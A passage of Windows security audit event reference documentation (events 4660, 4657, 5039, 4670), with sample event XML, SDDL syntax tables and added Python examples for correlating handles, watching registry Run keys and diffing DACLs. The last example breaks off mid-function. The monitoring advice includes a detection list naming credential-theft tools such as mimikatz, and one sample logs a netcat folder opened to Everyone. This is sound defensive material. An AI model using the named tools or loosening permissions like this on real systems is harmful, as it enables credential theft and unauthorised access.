    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-18T21:05:28.677152100Z" />
    <EventRecordID>270188</EventRecordID>
    <Correlation />
    <Execution ProcessID="4" ThreadID="3060" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x4367b</Data>
    <Data Name="ObjectServer">Security</Data>
    <Data Name="HandleId">0x1678</Data>
    <Data Name="ProcessId">0xef0</Data>
    <Data Name="ProcessName">C:\Windows\explorer.exe</Data>
    <Data Name="TransactionId">{00000000-0000-0000-0000-000000000000}</Data>
  </EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “delete object” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system uses the SID in the access
token to identify the user in all subsequent interactions with Windows security. When a SID has been used as
the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For
more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “delete object”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and
include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you
correlate this event with other events that might contain the same Handle ID, for example, “4663(S): An
attempt was made to access an object.” This parameter might not be captured in the event, and in that case
appears as “0x0”.
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that deleted the object. Process ID
(PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a
specific process you can, for example, use Task Manager (Details tab, PID column):

If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Transaction ID [Type = GUID]: unique GUID of the transaction. This field can help you correlate this event with other events that might contain the same Transaction ID, such as “4656(S, F): A handle to an object was requested.”
This parameter might not be captured in the event, and in that case appears as “{00000000-0000-0000-0000-000000000000}”.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.
Security Monitoring Recommendations
For 4660(S): An object was deleted.
This event doesn’t contain the name of the deleted object (only the Handle ID). It is better to use “4663(S): An attempt was made to access an object” events with DELETE access to track object deletion actions.
For kernel objects, this event and other auditing events have little to no security relevance and are hard to parse or analyze. There is no recommendation for auditing them, unless you know exactly what you need to monitor at the Kernel objects level.
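The text above says 4658 is useful for learning how long a handle was open and that 4660 carries only the Handle ID; both become usable only when joined to the 4656 event that opened the handle. The following added example (not code from the page) does that join in Python on a small constructed event list: it keys events by ProcessId and HandleId, takes the object and process name from the 4656, marks the handle deleted when a 4660 with the same key arrives, and computes the open duration from the 4658. It pulls fields with regular expressions rather than a full XML parse, which is enough for the documented Data layout; the HandleId, ProcessId and timestamp values are borrowed from the samples in this section and the object names are made up.

```python
import re
from datetime import datetime, timedelta, timezone
from typing import Dict, List

DATA_RE = re.compile(r'<Data Name="([^"]+)">([^<]*)</Data>')


def event_fields(xml_text: str) -> Dict[str, str]:
    """EventID, SystemTime and every EventData field of one event (regex, not a full XML parse)."""
    fields = dict(DATA_RE.findall(xml_text))
    fields["EventID"] = re.search(r"<EventID>(\d+)</EventID>", xml_text).group(1)
    fields["Time"] = re.search(r'SystemTime="([^"]+)"', xml_text).group(1)
    return fields


def parse_time(system_time: str) -> datetime:
    """SystemTime carries seven fractional digits; datetime only holds microseconds."""
    base, _, frac = system_time.rstrip("Z").partition(".")
    return datetime.fromisoformat(base).replace(tzinfo=timezone.utc) + timedelta(microseconds=int(frac[:6] or 0))


def correlate_handles(events: List[str]) -> List[dict]:
    """Pair each 4656 with the 4658 (and any 4660) that share its ProcessId and HandleId.

    Handle IDs are reused after a close, so a 4658 always settles the most recent
    open with the same key. Handles still open at the end are reported with closed=None.
    """
    open_handles: Dict[tuple, dict] = {}
    closed: List[dict] = []
    for ev in sorted((event_fields(e) for e in events), key=lambda f: f["Time"]):
        key = (ev.get("ProcessId"), ev.get("HandleId"))
        if ev["EventID"] == "4656":
            open_handles[key] = {"object": ev.get("ObjectName"), "process": ev.get("ProcessName"),
                                 "opened": parse_time(ev["Time"]), "deleted": False,
                                 "closed": None, "open_seconds": None}
        elif ev["EventID"] == "4660" and key in open_handles:
            open_handles[key]["deleted"] = True          # 4660 has no object name; the 4656 supplies it
        elif ev["EventID"] == "4658" and key in open_handles:
            rec = open_handles.pop(key)
            rec["closed"] = parse_time(ev["Time"])
            rec["open_seconds"] = (rec["closed"] - rec["opened"]).total_seconds()
            closed.append(rec)
    return closed + list(open_handles.values())


# Constructed events (not from the page); only the fields this correlation reads are included.
def _event(event_id: str, system_time: str, handle_id: str, extra: str = "") -> str:
    return (f'<Event><System><EventID>{event_id}</EventID>'
            f'<TimeCreated SystemTime="{system_time}" /></System><EventData>'
            f'<Data Name="SubjectUserName">dadmin</Data><Data Name="HandleId">{handle_id}</Data>'
            f'<Data Name="ProcessId">0xef0</Data><Data Name="ProcessName">C:\\Windows\\explorer.exe</Data>'
            f'{extra}</EventData></Event>')


SAMPLE_EVENTS = [
    _event("4656", "2015-09-18T21:05:28.677152100Z", "0x1678", '<Data Name="ObjectName">C:\\Documents\\old.txt</Data>'),
    _event("4660", "2015-09-18T21:05:29.877152100Z", "0x1678"),
    _event("4658", "2015-09-18T21:05:30.177152100Z", "0x1678"),
    _event("4656", "2015-09-18T21:05:31.000000000Z", "0x18a8", '<Data Name="ObjectName">C:\\Documents\\keep.txt</Data>'),
]

if __name__ == "__main__":
    for rec in correlate_handles(SAMPLE_EVENTS):
        print(rec["object"], "deleted" if rec["deleted"] else "kept", rec["open_seconds"])
```

In a real pipeline the events would be sorted by EventRecordID rather than by timestamp, since two events can share a SystemTime; the key choice (ProcessId plus HandleId) is the part that matters.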
4657(S): A registry value was modified.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Registry
Event Description:
This event generates when a registry key
value was modified. It doesn’t generate when
a registry key was modified.
This event generates only if “Set Value” auditing is set in registry key’s SACL.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4657</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>12801</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-24T01:28:43.639634100Z" />
    <EventRecordID>744725</EventRecordID>
    <Correlation />
    <Execution ProcessID="4" ThreadID="4824" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x364eb</Data>
    <Data Name="ObjectName">\REGISTRY\MACHINE</Data>
    <Data Name="ObjectValueName">Name_New</Data>
    <Data Name="HandleId">0x54</Data>
    <Data Name="OperationType">%%1905</Data>
    <Data Name="OldValueType">%%1873</Data>
    <Data Name="OldValue" />
    <Data Name="NewValueType">%%1873</Data>
    <Data Name="NewValue">Andrei</Data>
    <Data Name="ProcessId">0xce4</Data>
    <Data Name="ProcessName">C:\Windows\regedit.exe</Data>
  </EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “modify registry value” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “modify registry
value” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Name [Type = UnicodeString]: full path and name of the registry key whose value was modified.
The format is: \REGISTRY\HIVE\PATH where:
HIVE:
HKEY_LOCAL_MACHINE = \REGISTRY\MACHINE
HKEY_CURRENT_USER = \REGISTRY\USER\[USER_SID], where [USER_SID] is the SID of the current user.
HKEY_CLASSES_ROOT = \REGISTRY\MACHINE\SOFTWARE\Classes
HKEY_USERS = \REGISTRY\USER
HKEY_CURRENT_CONFIG = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware Profiles\Current
PATH – path to the registry key.
Object Value Name [Type = UnicodeString]: the name of modified registry key value.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you
correlate this event with other events that might contain the same Handle ID, for example, “4656: A handle
to an object was requested.” This parameter might not be captured in the event, and in that case appears as
“0x0”.
Operation Type [Type = UnicodeString]: the type of operation performed on the registry key value. Most
common operations are:
New registry value created
Registry value deleted
Existing registry value modified
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the registry key value
was modified. Process ID (PID) is a number used by the operating system to uniquely identify an active
process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID
column):
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Change Information:
Old Value Type [Type = UnicodeString]: old type of changed registry key value. Registry key value types:

VALUE TYPE      DESCRIPTION
REG_SZ          String
REG_BINARY      Binary
REG_DWORD       DWORD (32-bit) Value
REG_QWORD       QWORD (64-bit) Value
REG_MULTI_SZ    Multi-String Value
REG_EXPAND_SZ   Expandable String Value

Old Value [Type = UnicodeString]: old value for changed registry key value.
New Value Type [Type = UnicodeString]: new type of changed registry key value. See table above for
possible values.
New Value [Type = UnicodeString]: new value for changed registry key value.

Security Monitoring Recommendations
For 4657(S): A registry value was modified.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with
“Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz”
or “cain.exe”), check for these substrings in “Process Name.”
If Object Name is a sensitive or critical registry key for which you need to monitor any modification of its
values, monitor all 4657 events.
If Object Name has specific values (Object Value Name) and you need to monitor modifications of these
values, monitor for all 4657 events.
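Two steps an analyst needs for the key-specific 4657 recommendations just given: translate the logged Object Name from the \REGISTRY\HIVE\PATH form described under Object Name into the HKEY_* names watchlists are actually written in, then match key and Object Value Name against that watchlist. The block below is an added example, not code from the page; the hive prefixes are the ones listed above, the autostart Run keys in the constructed watchlist are real locations, the Contoso\Agent key and its UpdateServer value are hypothetical, and the sample events reuse the page's SID and its \REGISTRY\MACHINE / Name_New pair.

```python
from typing import Dict, Optional, Tuple

# Object-name prefixes from the HIVE list above, longest first: HKEY_CLASSES_ROOT and
# HKEY_CURRENT_CONFIG both live below \REGISTRY\MACHINE and must win over it.
HIVE_PREFIXES = (
    (r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware Profiles\Current", "HKEY_CURRENT_CONFIG"),
    (r"\REGISTRY\MACHINE\SOFTWARE\Classes", "HKEY_CLASSES_ROOT"),
    (r"\REGISTRY\MACHINE", "HKEY_LOCAL_MACHINE"),
    (r"\REGISTRY\USER", "HKEY_USERS"),
)

# Constructed watchlist of (key, value name); None matches any value under the key.
# The Run keys are the standard autostart locations; the Contoso\Agent key is hypothetical.
WATCHLIST = (
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", None),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", None),
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Contoso\Agent", "UpdateServer"),
)


def normalize_key(object_name: str, subject_sid: Optional[str] = None) -> str:
    r"""Rewrite a 4657 Object Name (\REGISTRY\HIVE\PATH) in HKEY_* form.

    \REGISTRY\USER\<SID>\... becomes HKEY_CURRENT_USER\... only when <SID> is the
    subject's own SID; another user's hive stays under HKEY_USERS.
    """
    upper = object_name.upper()
    for prefix, root in HIVE_PREFIXES:
        if not upper.startswith(prefix.upper()):
            continue
        rest = object_name[len(prefix):]
        if root == "HKEY_USERS" and subject_sid:
            sid_prefix = "\\" + subject_sid
            tail = rest[len(sid_prefix):]
            # Require a separator (or nothing) after the SID so that
            # \REGISTRY\USER\<SID>_Classes is not mistaken for the user's own hive.
            if rest.upper().startswith(sid_prefix.upper()) and (tail == "" or tail.startswith("\\")):
                return "HKEY_CURRENT_USER" + tail
        return root + rest
    return object_name  # unknown prefix: leave as logged


def match_watchlist(event: Dict[str, str]) -> Optional[Tuple[str, Optional[str]]]:
    """Return the watchlist entry a 4657 event hits, or None."""
    key = normalize_key(event["ObjectName"], event.get("SubjectUserSid")).upper()
    value = event.get("ObjectValueName", "").upper()
    for wl_key, wl_value in WATCHLIST:
        if key == wl_key.upper() and (wl_value is None or wl_value.upper() == value):
            return (wl_key, wl_value)
    return None


# Constructed 4657 field sets; the SID and the \REGISTRY\MACHINE / Name_New pair are the page's sample values.
SID = "S-1-5-21-3457937927-2839227994-823803824-1104"
EVENTS = [
    {"SubjectUserSid": SID, "ObjectValueName": "Updater",
     "ObjectName": "\\REGISTRY\\USER\\" + SID + r"\Software\Microsoft\Windows\CurrentVersion\Run"},
    {"SubjectUserSid": SID, "ObjectName": r"\REGISTRY\MACHINE", "ObjectValueName": "Name_New"},
    {"SubjectUserSid": SID, "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Contoso\Agent", "ObjectValueName": "UpdateServer"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(normalize_key(ev["ObjectName"], ev["SubjectUserSid"]), "->", match_watchlist(ev))
```

Registry paths are case-insensitive, so both sides are compared upper-cased; the subject SID comes from the event's own Subject fields, which is what makes the HKEY_CURRENT_USER rewrite correct for the account that made the change.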
5039(-): A registry key was virtualized.
4/5/2019

Applies to
Windows 10
Windows Server 2016
This event should be generated when a registry key was virtualized using LUAFV.
This event occurs very rarely during standard LUAFV registry key virtualization.
There is no example of this event in this document.
Subcategory: Audit Registry
Event Schema:
A registry key was virtualized.
Subject:
Security ID:%1
Account Name:%2
Account Domain:%3
Logon ID:%4
Object:
Key Name:%5
Virtual Key Name:%6
Process Information:
Process ID:%7
Process Name:%8

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.

Security Monitoring Recommendations
There is no recommendation for this event in this document.
4670(S): Permissions on an object were changed.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit
Registry, Audit Authentication Policy Change,
and Audit Authorization Policy Change
Event Description:
This event generates when the permissions for
an object are changed. The object could be a
file system, registry, or security token object.
This event does not generate if the SACL (Auditing ACL) was changed.
Before this event can generate, certain ACEs might need to be set in the object’s SACL. For example, for a file system object, it generates only if “Change Permissions” and/or “Take Ownership” are set in the object’s SACL. For a registry key, it generates only if “Write DAC” and/or “Write Owner” are set in the object’s SACL.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4670</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13570</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-18T19:36:50.187044600Z" />
    <EventRecordID>269529</EventRecordID>
    <Correlation />
    <Execution ProcessID="516" ThreadID="524" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x43659</Data>
    <Data Name="ObjectServer">Security</Data>
    <Data Name="ObjectType">File</Data>
    <Data Name="ObjectName">C:\Documents\netcat-1.11</Data>
    <Data Name="HandleId">0x3f0</Data>
    <Data Name="OldSd">D:AI(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)</Data>
    <Data Name="NewSd">D:ARAI(A;OICI;FA;;;WD)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)</Data>
    <Data Name="ProcessId">0xdb0</Data>
    <Data Name="ProcessName">C:\Windows\System32\dllhost.exe</Data>
  </EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “change object’s permissions” operation. Event
Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will
see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique
identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “change object’s
permissions” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Object Type [Type = UnicodeString]: The type of an object that was accessed during the operation.
The following list contains the most common Object Types:

Directory, Event, Timer, Device, Mutant, Type, File, Token, Thread, Section, WindowStation, DebugObject, FilterCommunicationPort, EventPair, Driver, IoCompletion, Controller, SymbolicLink, WmiGuid, Process, Profile, Desktop, KeyedEvent, Adapter, Key, WaitablePort, Callback, Semaphore, Job, Port, FilterConnectionPort, ALPC Port

Object Name [Type = UnicodeString]: name and other identifying information for the object for which
permissions were changed. For example, for a file, the path would be included. For Token objects, this field
typically equals “-“.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you
correlate this event with other events that might contain the same Handle ID, for example, “4663(S): An
attempt was made to access an object.” This parameter might not be captured in the event, and in that case
appears as “0x0”.
Process:
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the permissions were
changed. Process ID (PID) is a number used by the operating system to uniquely identify an active process.
To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column):
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Permissions Change:
Original Security Descriptor [Type = UnicodeString]: the old Security Descriptor Definition Language (SDDL) value for the object.
New Security Descriptor [Type = UnicodeString]: the new Security Descriptor Definition Language (SDDL) value for the object.

Note The Security Descriptor Definition Language (SDDL) defines string elements for enumerating information contained in the security descriptor.
Example:
O:BAG:SYD:(D;;0xf0007;;;AN)(D;;0xf0007;;;BG)(A;;0xf0007;;;SY)(A;;0x7;;;BA)S:ARAI(AU;SAFA;DCLCRPCRSDWDWO;;;WD)
O: = Owner. SID of specific security principal, or reserved (pre-defined) value, for example: BA (BUILTIN_ADMINISTRATORS), WD (Everyone), SY (LOCAL_SYSTEM), etc. See the list of possible values in the table below:

VALUE   DESCRIPTION
"AO"    Account operators
"RU"    Alias to allow previous Windows 2000
"AN"    Anonymous logon
"AU"    Authenticated users
"BA"    Built-in administrators
"BG"    Built-in guests
"BO"    Backup operators
"BU"    Built-in users
"CA"    Certificate server administrators
"CG"    Creator group
"CO"    Creator owner
"DA"    Domain administrators
"DC"    Domain computers
"DD"    Domain controllers
"DG"    Domain guests
"DU"    Domain users
"EA"    Enterprise administrators
"ED"    Enterprise domain controllers
"WD"    Everyone
"PA"    Group Policy administrators
"IU"    Interactively logged-on user
"LA"    Local administrator
"LG"    Local guest
"LS"    Local service account
"SY"    Local system
"NU"    Network logon user
"NO"    Network configuration operators
"NS"    Network service account
"PO"    Printer operators
"PS"    Personal self
"PU"    Power users
"RS"    RAS servers group
"RD"    Terminal server users
"RE"    Replicator
"RC"    Restricted code
"SA"    Schema administrators
"SO"    Server operators
"SU"    Service logon user

G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
DACL/SACL entry format:
entry_type:inheritance_flags(ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
Example: D:(A;;FA;;;WD)
entry_type:
"D" - DACL
"S" - SACL
inheritance_flags:
"P" - SDDL_PROTECTED, inheritance from containers that are higher in the folder hierarchy is blocked.
"AI" - SDDL_AUTO_INHERITED, inheritance is allowed, assuming that "P" is not also set.
"AR" - SDDL_AUTO_INHERIT_REQ, child objects inherit permissions from this object.
ace_type:
"A" - ACCESS ALLOWED
"D" - ACCESS DENIED
"OA" - OBJECT ACCESS ALLOWED: only applies to a subset of the object(s).
"OD" - OBJECT ACCESS DENIED: only applies to a subset of the object(s).
"AU" - SYSTEM AUDIT
"AL" - SYSTEM ALARM
"OU" - OBJECT SYSTEM AUDIT
"OL" - OBJECT SYSTEM ALARM
ace_flags:
"CI" - CONTAINER INHERIT: child objects that are containers, such as directories, inherit the ACE as an explicit ACE.
"OI" - OBJECT INHERIT: child objects that are not containers inherit the ACE as an explicit ACE.
"NP" - NO PROPAGATE: only immediate children inherit this ACE.
"IO" - INHERITANCE ONLY: the ACE doesn’t apply to this object, but may affect children via inheritance.
"ID" - ACE IS INHERITED
"SA" - SUCCESSFUL ACCESS AUDIT
"FA" - FAILED ACCESS AUDIT
rights: A hexadecimal string which denotes the access mask, or a reserved value, for example: FA (File All Access), FX (File Execute), FW (File Write), etc.

VALUE   DESCRIPTION

Generic access rights
"GA"    GENERIC ALL
"GR"    GENERIC READ
"GW"    GENERIC WRITE
"GX"    GENERIC EXECUTE

File access rights
"FA"    FILE ALL ACCESS
"FR"    FILE GENERIC READ
"FW"    FILE GENERIC WRITE
"FX"    FILE GENERIC EXECUTE

Registry key access rights
"KA"    KEY ALL ACCESS
"KR"    KEY READ
"KW"    KEY WRITE
"KX"    KEY EXECUTE

Directory service access rights
"RC"    Read Permissions
"SD"    Delete
"WD"    Modify Permissions
"WO"    Modify Owner
"RP"    Read All Properties
"WP"    Write All Properties
"CC"    Create All Child Objects
"DC"    Delete All Child Objects
"LC"    List Contents
"SW"    All Validated Writes
"LO"    List Object
"DT"    Delete Subtree
"CR"    All Extended Rights

object_guid: N/A
inherit_object_guid: N/A
account_sid: SID of specific security principal, or reserved value, for example: AN (Anonymous), WD (Everyone), SY (LOCAL_SYSTEM), etc. See the table above for more details.
For more information about SDDL syntax, see these articles: https://msdn.microsoft.com/library/cc230374.aspx,
https://msdn.microsoft.com/library/windows/hardware/aa374892(v=vs.85).aspx.
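Because 4670 carries both the Original and New Security Descriptor in SDDL, the practical check is to parse both strings by field and report what changed, rather than string-compare them. The block below is an added example in Python and not code from the page or from Windows: it splits the O:/G:/D:/S: sections, parses each ACE into type, flags, rights and trustee using the syntax documented above, diffs the two DACLs, and flags Allow ACEs that hand write-class rights to broad principals. The alias dictionaries are a subset of the tables above, the choice of which principals count as broad and which rights as write-class is the example's own policy, and the OldSd/NewSd inputs are copied from the 4670 event XML earlier in this section, where the new ACE grants FA to WD (Everyone).

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Subset of the alias tables above. The same two letters can be a principal in the
# account_sid field and a right in the rights field (WD = Everyone / Modify Permissions),
# so each field is decoded on its own.
SID_ALIASES = {"WD": "Everyone", "AU": "Authenticated users", "AN": "Anonymous logon",
               "BA": "Built-in administrators", "BU": "Built-in users", "BG": "Built-in guests",
               "SY": "Local system", "CO": "Creator owner", "DA": "Domain administrators"}
RIGHTS_ALIASES = {"GA": "GENERIC ALL", "GR": "GENERIC READ", "GW": "GENERIC WRITE",
                  "GX": "GENERIC EXECUTE", "FA": "FILE ALL ACCESS", "FR": "FILE GENERIC READ",
                  "FW": "FILE GENERIC WRITE", "FX": "FILE GENERIC EXECUTE", "KA": "KEY ALL ACCESS",
                  "KR": "KEY READ", "KW": "KEY WRITE", "KX": "KEY EXECUTE"}
# Example policy: principals that make a grant "broad", and the rights that matter when granted to them.
BROAD_PRINCIPALS = {"WD", "AU", "AN", "BU", "BG"}
WRITE_RIGHTS = {"GA", "GW", "FA", "FW", "KA", "KW", "WD", "WO", "SD"}


@dataclass(frozen=True)
class Ace:
    ace_type: str             # A, D, AU, ...
    flags: Tuple[str, ...]    # OI, CI, ID, ...
    rights: Tuple[str, ...]   # two-letter aliases, or one hex mask such as "0xf0007"
    sid: str                  # alias (WD) or literal SID (S-1-5-21-...)


@dataclass(frozen=True)
class Acl:
    flags: str                # P / AI / AR text between "D:" (or "S:") and the first ACE
    aces: Tuple[Ace, ...]


def _pairs(s: str) -> Tuple[str, ...]:
    """'OICIID' -> ('OI', 'CI', 'ID')."""
    return tuple(s[i:i + 2] for i in range(0, len(s), 2))


def parse_ace(body: str) -> Ace:
    fields = body.split(";")
    if len(fields) < 6:
        raise ValueError(f"malformed ACE: ({body})")
    ace_type, flags, rights, _object_guid, _inherit_guid, sid = fields[:6]
    rights_t = (rights,) if rights.lower().startswith("0x") else _pairs(rights)
    return Ace(ace_type, _pairs(flags), rights_t, sid)


def parse_acl(text: str) -> Acl:
    head = text.partition("(")[0]
    return Acl(head, tuple(parse_ace(b) for b in re.findall(r"\(([^)]*)\)", text)))


def split_sections(sddl: str) -> Dict[str, str]:
    """Cut the string at O:, G:, D:, S: markers that sit outside ACE parentheses."""
    sections: Dict[str, str] = {}
    key, buf, depth, i = None, [], 0, 0
    while i < len(sddl):
        ch = sddl[i]
        if depth == 0 and ch in "OGDS" and sddl[i + 1:i + 2] == ":":
            if key is not None:
                sections[key] = "".join(buf)
            key, buf, i = ch, [], i + 2
            continue
        depth += (ch == "(") - (ch == ")")
        buf.append(ch)
        i += 1
    if key is not None:
        sections[key] = "".join(buf)
    return sections


def parse_sddl(sddl: str) -> dict:
    s = split_sections(sddl)
    return {"owner": s.get("O"), "group": s.get("G"),
            "dacl": parse_acl(s["D"]) if "D" in s else None,
            "sacl": parse_acl(s["S"]) if "S" in s else None}


def describe_ace(ace: Ace) -> str:
    rights = "+".join(RIGHTS_ALIASES.get(r, r) for r in ace.rights)
    return f"{ace.ace_type} {rights} to {SID_ALIASES.get(ace.sid, ace.sid)} [{','.join(ace.flags)}]"


def diff_dacl(old_sddl: str, new_sddl: str) -> dict:
    """ACEs added and removed between the event's OldSd and NewSd, plus the DACL flag change."""
    old, new = parse_sddl(old_sddl)["dacl"], parse_sddl(new_sddl)["dacl"]
    old_set, new_set = set(old.aces), set(new.aces)
    return {"added": [a for a in new.aces if a not in old_set],
            "removed": [a for a in old.aces if a not in new_set],
            "flags": (old.flags, new.flags)}


def broad_grants(aces) -> List[Ace]:
    """Allow ACEs giving write-class rights (or an opaque hex mask) to a broad principal."""
    return [a for a in aces
            if a.ace_type == "A" and a.sid in BROAD_PRINCIPALS and a.rights
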